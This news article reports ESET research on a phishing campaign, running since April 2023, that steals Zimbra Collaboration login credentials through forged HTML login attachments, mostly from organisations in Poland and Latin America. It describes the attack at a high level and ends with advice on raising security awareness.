Massive Phishing Campaign Targets Latin American Countries: ESET

In recent months, collaborative software platform Zimbra Collaboration has become the target of a significant phishing campaign aimed at extracting users' sensitive information. According to findings by ESET, this phishing campaign, which commenced in April 2023, has predominantly impacted small and medium-sized enterprises (SMEs), as well as government entities. If successful, this cyberattack has the potential to infiltrate the ranks of approximately 200,000 businesses relying on Zimbra's services across the world.

“Despite this campaign not being so technically sophisticated, it is still able to spread and successfully compromise organizations that use Zimbra Collaboration, which remains an attractive target for adversaries,” says Viktor Šperka, Cybersecurity Researcher, ESET. The platform's attractiveness to cybercriminals is partly due to the expectation that organizations with tighter IT budgets are more susceptible to cybersecurity breaches. 

ESET's analysis reveals that the phishing campaign has cast its net over multiple countries in Latin America and the EU, with Poland experiencing the highest number of attacks, followed by Ecuador and Italy. While the identity of the hacking group responsible for these assaults remains undisclosed, its actions have significantly impacted businesses throughout Latin America. Notably, Ecuador, Mexico, Argentina, Chile, Peru and Brazil have recorded the highest number of cyberthreat attempts in recent months.

The phishing operation kicks off with an innocuous-looking email, often adorned with urgent subject lines such as server updates or account deactivation warnings. The attacker goes to great lengths to impersonate email server administrators, further luring victims into their trap. Finally, users are prompted to click on an HTML attachment, serving as the entry point for the attack.

Upon opening the attachment, victims encounter a meticulously forged Zimbra login page, tailored to mimic their organization's branding. While this fake page opens within the victim's web browser, the URL suggests authenticity, even though it redirects to a local path. Once the victim inputs their credentials into the falsified HTML form, the attacker efficiently extracts this information. The credentials are then transmitted via an HTTPS POST request to the attacker's server, completing the cyberattack cycle.

Notably, this campaign does not discriminate based on industry verticals. Apparently, the sole common thread among victims is their reliance on Zimbra's software. However, the campaign's effectiveness underscores the global deficiency in cybersecurity awareness within organizations across the world. Stanford studies show that 85% of all data breaches are caused by an employee mistake, substantially increasing the probability of suffering from phishing cyberattacks. 

The Zimbra phishing campaign serves as a reminder that even reputable platforms are not immune to exploitation. Organizations within Mexico, for example, should promote information sharing, educate their employees about phishing threats and implement robust security measures to safeguard against such insidious attacks. By proactively addressing the vulnerabilities within the nation's digital infrastructure and cultivating a culture of cybersecurity resilience, Mexico can mitigate the risks posed by evolving cyberthreats and emerge as a more secure and resilient digital ecosystem.